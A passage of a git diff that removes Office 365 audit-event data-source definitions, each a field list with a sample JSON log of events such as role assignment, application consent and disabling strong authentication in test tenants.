"OldValue": ""}, {"Name": "AppRole.DisplayName", "NewValue": "Use Exchange Web Services with full access to all mailboxes", "OldValue": ""}, {"Name": "AppRoleAssignment.CreatedDateTime", "NewValue": "2/8/2024 9:49:53 PM", "OldValue": ""}, {"Name": "AppRoleAssignment.LastModifiedDateTime", "NewValue": "2/8/2024 9:49:53 PM", "OldValue": ""}, {"Name": "ServicePrincipal.ObjectID", "NewValue": "2e5c2fd0-cca4-452c-9891-a07c0dafd964", "OldValue": ""}, {"Name": "ServicePrincipal.DisplayName", "NewValue": "STRT_Oauth", "OldValue": ""}, {"Name": "ServicePrincipal.AppId", "NewValue": "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "OldValue": ""}, {"Name": "ServicePrincipal.Name", "NewValue": "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "NewValue": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com", "OldValue": ""}], "Actor": [{"ID": "LegacyTestOAuthApp", "Type": 1}, {"ID": "869dc64b-95b2-4003-8098-3ba39296ea46", "Type": 2}, {"ID": "ServicePrincipal_fc8c8125-bc0c-499d-8344-e53c6e3caa81", "Type": 2}, {"ID": "fc8c8125-bc0c-499d-8344-e53c6e3caa81", "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}], "ActorContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "InterSystemsId": "ed53faec-49b5-444f-b6af-b928558ca433", "IntraSystemId": "00000000-0000-0000-0000-000000000000", "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_8429eb5c-faeb-4ade-8eac-acc003790769", "Type": 2}, {"ID": "8429eb5c-faeb-4ade-8eac-acc003790769", "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}, {"ID": "Office 365 Exchange Online", "Type": 1}, {"ID": "00000002-0000-0ff1-ce00-000000000000", "Type": 2}, {"ID": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com", "Type": 4}], "TargetContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4"}'
diff --git a/data_sources/cloud/event_sources/O365_Add_member_to_role.yml b/data_sources/cloud/event_sources/O365_Add_member_to_role.yml
deleted file mode 100644
index 05df9d0465..0000000000
--- a/data_sources/cloud/event_sources/O365_Add_member_to_role.yml
+++ /dev/null
@@ -1,74 +0,0 @@
-event_name: O365 Add member to role.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-10-20T16:50:46", "Id": "30a8b107-b190-406c-9b80-c3f5c3a29129", "Operation": "Add member to role.", "OrganizationId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "lowpriv@splunkresearch.onmicrosoft.com", "UserId": "attacker@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory", "Value": "Role"}], "ModifiedProperties": [{"Name": "Role.ObjectID", "NewValue": "0ee19da2-ee3d-4743-ae53-8cb79599c384", "OldValue": ""}, {"Name": "Role.DisplayName", "NewValue": "Company Administrator", "OldValue": ""}, {"Name": "Role.TemplateId", "NewValue": "62e90394-69f5-4237-9190-012177145e10", "OldValue": ""}, {"Name": "Role.WellKnownObjectName", "NewValue": "TenantAdmins", "OldValue": ""}], "Actor": [{"ID": "attacker@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "Microsoft Office 365 Portal", "Type": 1}, {"ID": "00000006-0000-0ff1-ce00-000000000000", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5", "InterSystemsId": "6a6b4dfe-8b77-49db-9999-510115d1f3dd", "IntraSystemId": "c36bfbae-b287-415b-bc14-ab5c3a9248d7", "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "lowpriv@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9", "Type": 3}], "TargetContextId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5"}'
diff --git a/data_sources/cloud/event_sources/O365_Add_owner_to_application.yml b/data_sources/cloud/event_sources/O365_Add_owner_to_application.yml
deleted file mode 100644
index 5d86c6264c..0000000000
--- a/data_sources/cloud/event_sources/O365_Add_owner_to_application.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: O365 Add owner to application.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-09-07T13:42:04", "Id": "6e2c723b-8f6e-47f4-8c60-fa23ef3fccee", "Operation": "Add owner to application.", "OrganizationId": "48203edf-5d2c-45f2-8123-a368cc8b0e51", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "user2@contoso.onmicrosoft.com", "UserId": "user@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\"}"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}], "ModifiedProperties": [{"Name": "Application.ObjectID", "NewValue": "a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "OldValue": ""}, {"Name": "Application.DisplayName", "NewValue": "TestApp2", "OldValue": ""}, {"Name": "Application.AppId", "NewValue": "95106c0e-3519-450e-8e38-7f326d873454", "OldValue": ""}], "Actor": [{"ID": "user@contoso.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "48203edf-5d2c-45f2-8123-a368cc8b0e51", "InterSystemsId": "3f6a58c5-2fba-401d-b137-82b860830213", "IntraSystemId": "e8034ddc-0ca3-4aca-996c-1dc6dee48679", "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "user2@contoso.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9", "Type": 3}], "TargetContextId": "48203edf-5d2c-45f2-8123-a368cc8b0e51"}'
diff --git a/data_sources/cloud/event_sources/O365_Add_service_principal.yml b/data_sources/cloud/event_sources/O365_Add_service_principal.yml
deleted file mode 100644
index 85d80ff74a..0000000000
--- a/data_sources/cloud/event_sources/O365_Add_service_principal.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: O365 Add service principal.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src_user
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2024-02-07T22:31:14", "Id": "f624ed92-b4a2-4d42-aa8b-20a261d06b7f", "Operation": "Add service principal.", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "UserId": "user30@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\",\"AppId\":\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"}"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties": [{"Name": "AccountEnabled", "NewValue": "[\r\n  true\r\n]", "OldValue": "[]"}, {"Name": "AppPrincipalId", "NewValue": "[\r\n  \"e06366ca-8489-4748-b6a2-d7e4332f45c1\"\r\n]", "OldValue": "[]"}, {"Name": "DisplayName", "NewValue": "[\r\n  \"Malicious11\"\r\n]", "OldValue": "[]"}, {"Name": "ServicePrincipalName", "NewValue": "[\r\n  \"e06366ca-8489-4748-b6a2-d7e4332f45c1\"\r\n]", "OldValue": "[]"}, {"Name": "Credential", "NewValue": "[\r\n  {\r\n    \"CredentialType\": 2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n  }\r\n]", "OldValue": "[]"}, {"Name": "Included Updated Properties", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "NewValue": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "OldValue": ""}], "Actor": [{"ID": "user30@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "InterSystemsId": "ea473f15-64b3-435a-a885-6ee3908919e2", "IntraSystemId": "00000000-0000-0000-0000-000000000000", "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_2dedf863-ac93-4f45-87b3-e32f48145380", "Type": 2}, {"ID": "2dedf863-ac93-4f45-87b3-e32f48145380", "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}, {"ID": "Malicious11", "Type": 1}, {"ID": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "Type": 2}, {"ID": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "Type": 4}], "TargetContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4"}'
diff --git a/data_sources/cloud/event_sources/O365_Change_user_license.yml b/data_sources/cloud/event_sources/O365_Change_user_license.yml
deleted file mode 100644
index 362d8b335a..0000000000
--- a/data_sources/cloud/event_sources/O365_Change_user_license.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: O365 Change user license.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src_user
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-09-11T15:55:46", "Id": "1e39f32d-081d-4494-994a-533b57f91df7", "Operation": "Change user license.", "OrganizationId": "bbad9541-eb53-4533-bcef-2b76182c3b75", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "victimUser@splunkresearch.onmicrosoft.com", "UserId": "evilUser@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"id\":\"64c07906-cb25-4d37-b38c-a862f2e49671\",\"seq\":\"6\",\"b\":\"://admin.microsoft.com;https://wusportalprv.office.com;https://auth.microsoftonline.com;https://portal.office.com;https://portal-sdf.office.com/;https://portal.office.com/;https://cp.portal.office.com/;https://scuportalprv.office.com;https://ncuportalprv.office.com;https://ncuportal.office.com;https://weuportal.office.com;https://eusportal.office.com;https://neuportal.office.com;https://scuportal.office.com;https://seaportal.office.com;https://wusportal.office.com;https://easportal.office.com;https://wjpportal.office.com;https://ejpportal.office.com;https://nukportal.office.com;https://sukportal.office.com;https://admin-ignite.microsoft.com;https://admin-sdf.microsoft.com;https://wukportal.office.com/\\\\\\\"},{\\\\\\\"Name\\\\\\\":\\\\\\\"SPN\\\\\\\",\\\\\\\"OldValue\\\\\\\":null,\\\\\\\"NewValue\\\\\\\":\\\\\\\"Microsoft.Office365Portal;00000006-0000-0ff1-ce00-000000000000;00000006-0000-0ff1-ce00-000000000000/portal.microsoftonline.com;https://ncuportalprv-staging.office.com;https://scuportalprv-staging.office.com;https://admin.microsoft365.com;https://portal-sdf.apps.mil/;https://portal-sdf.apps.mil;https://portal.apps.mil/;https://portal.apps.mil;https://portal-sdf.office365.us/;https://portal-sdf.office365.us;https://portal.office365.us/;https://portal.office365.us;https://portal.microsoft.com;https://admin.microsoft.com;https://wusportalprv.office.com;https://auth.microsoftonline.com;https://portal.office.com;https://portal-sdf.office.com/;https://portal.office.com/;https://cp.portal.office.com/;https://scuportalprv.office.com;https://ncuportalprv.office.com;https://ncuportal.office.com;https://weuportal.office.com;https://eusportal.office.com;https://neuportal.office.com;https://scuportal.office.com;https://seaportal.office.com;https://wusportal.office.com;https://easportal.office.com;https://wjpportal.office.com;https://ejpportal.office.com;https://nukportal.office.com;https://sukportal.office.com;https://admin-ignite.microsoft.com;https://admin-sdf.microsoft.com;https://wukportal.office.com/\\\\\\\"}]\\\",\\\"additionalDetails\\\":\\\"{\\\\\\\"User-Agent\\\\\\\":\\\\\\\"O365AdminPortal\\\\\\\"}\\\"}\",\"c\":\"6\"}"}, {"Name": "extendedAuditEventCategory", "Value": "User"}], "ModifiedProperties": [], "Actor": [{"ID": "evilUser@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "Microsoft Office 365 Portal", "Type": 1}, {"ID": "00000006-0000-0ff1-ce00-000000000000", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "bbad9541-eb53-4533-bcef-2b76182c3b75", "InterSystemsId": "0817f79e-f0ea-4518-9c21-7babc9a36a79", "IntraSystemId": "6ae5503d-8764-4f6f-9547-668f4b2f82ca", "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "victimUser@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9", "Type": 3}], "TargetContextId": "bbad9541-eb53-4533-bcef-2b76182c3b75"}'
diff --git a/data_sources/cloud/event_sources/O365_Consent_to_application.yml b/data_sources/cloud/event_sources/O365_Consent_to_application.yml
deleted file mode 100644
index a2c04989c2..0000000000
--- a/data_sources/cloud/event_sources/O365_Consent_to_application.yml
+++ /dev/null
@@ -1,68 +0,0 @@
-event_name: O365 Consent to application.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- additionalDetails
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-09-05T21:05:31", "Id": "5822e126-1fbc-4269-9ad6-4c1879cdbcf3", "Operation": "Consent to application.", "OrganizationId": "9c00a473-1b2c-4bc2-9215-84df3f57aee5", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "95106c0e-3519-450e-8e38-7f326d873454", "UserId": "attacker@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\"AppId\":\"95106c0e-3519-450e-8e38-7f326d873454\"}"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "NewValue": "True", "OldValue": ""}, {"Name": "ConsentContext.IsAppOnly", "NewValue": "False", "OldValue": ""}, {"Name": "ConsentContext.OnBehalfOfAll", "NewValue": "True", "OldValue": ""}, {"Name": "ConsentContext.Tags", "NewValue": "", "OldValue": ""}, {"Name": "ConsentAction.Permissions", "NewValue": "[] => [[Id: r2KtIS6Zn0q2wWeqbIputLSZcc5Sj_NGtUtP2B3pYeI, ClientId: 21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4, PrincipalId: , ResourceId: ce7199b4-8f52-46f3-b54b-4fd81de961e2, ConsentType: AllPrincipals, Scope: User.Read, CreatedDateTime: , LastModifiedDateTime ]]; ", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "NewValue": "95106c0e-3519-450e-8e38-7f326d873454", "OldValue": ""}], "Actor": [{"ID": "attacker@contoso.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "9c00a473-1b2c-4bc2-9215-84df3f57aee5", "InterSystemsId": "e0fb6206-12db-4fdf-bf52-699b254124d3", "IntraSystemId": "897d35e6-e2dc-455e-ba65-e6d58adae01f", "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4", "Type": 2}, {"ID": "21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4", "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}, {"ID": "TestApp2", "Type": 1}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454", "Type": 2}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454", "Type": 4}], "TargetContextId": "9c00a473-1b2c-4bc2-9215-84df3f57aee5"}'
diff --git a/data_sources/cloud/event_sources/O365_Disable_Strong_Authentication.yml b/data_sources/cloud/event_sources/O365_Disable_Strong_Authentication.yml
deleted file mode 100644
index e61a782ac6..0000000000
--- a/data_sources/cloud/event_sources/O365_Disable_Strong_Authentication.yml
+++ /dev/null
@@ -1,69 +0,0 @@
-event_name: O365 Disable Strong Authentication.
-fields:
-- _time
-- ActorContextId
-- ActorIpAddress
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- ClientIP
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- additionalDetails
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- extendedAuditEventCategory
-- extended_properties
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"Actor": [{"ID": "rodsoto@rodsoto.onmicrosoft.com", "Type": 5}, {"ID": "10037FFEA938FB92", "Type": 3}, {"ID": "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "ActorIpAddress": "", "AzureActiveDirectoryEventType": 1, "ClientIP": "", "CreationTime": "2020-12-15T22:35:20", "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory", "Value": "User"}], "Id": "a5aea9c5-b879-495a-b764-119b2bd54d80", "InterSystemsId": "9d18b521-23df-4130-99e2-1ff2eee13333", "IntraSystemId": "7d96ab40-6e16-48e5-bf78-677c89683775", "ModifiedProperties": [{"Name": "StrongAuthenticationRequirement", "NewValue": "[]", "OldValue": "[\r\n  {\r\n    \"RelyingParty\": \"*\",\r\n    \"State\": 0,\r\n    \"RememberDevicesNotIssuedBefore\": \"2020-12-15T20:47:57+00:00\"\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "StrongAuthenticationRequirement", "OldValue": ""}], "ObjectId": "rodsoto@rodsoto.onmicrosoft.com", "Operation": "Disable Strong Authentication.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID": "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "rodsoto@rodsoto.onmicrosoft.com", "Type": 5}, {"ID": "10037FFEA938FB92", "Type": 3}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "UserId": "rodsoto@rodsoto.onmicrosoft.com", "UserKey": "10037FFEA938FB92@rodsoto.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
diff --git a/data_sources/cloud/event_sources/O365_MailItemsAccessed.yml b/data_sources/cloud/event_sources/O365_MailItemsAccessed.yml
deleted file mode 100644
index 5bddc5d467..0000000000
--- a/data_sources/cloud/event_sources/O365_MailItemsAccessed.yml
+++ /dev/null
@@ -1,65 +0,0 @@
-event_name: O365 MailItemsAccessed
-fields:
-- _time
-- AppId
-- ClientAppId
-- ClientIPAddress
-- ClientInfoString
-- CreationTime
-- ExternalAccess
-- Folders{}.FolderItems{}.InternetMessageId
-- Folders{}.FolderItems{}.SizeInBytes
-- Folders{}.Id
-- Folders{}.Path
-- Id
-- InternalLogonType
-- IsThrottled
-- LogonType
-- LogonUserSid
-- MailAccessType
-- MailboxGuid
-- MailboxOwnerSid
-- MailboxOwnerUPN
-- Operation
-- OperationCount
-- OperationProperties{}.Name
-- OperationProperties{}.Value
-- OrganizationId
-- OrganizationName
-- OriginatingServer
-- RecordType
-- ResultStatus
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc
-- host
-- index
-- linecount
-- punct
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
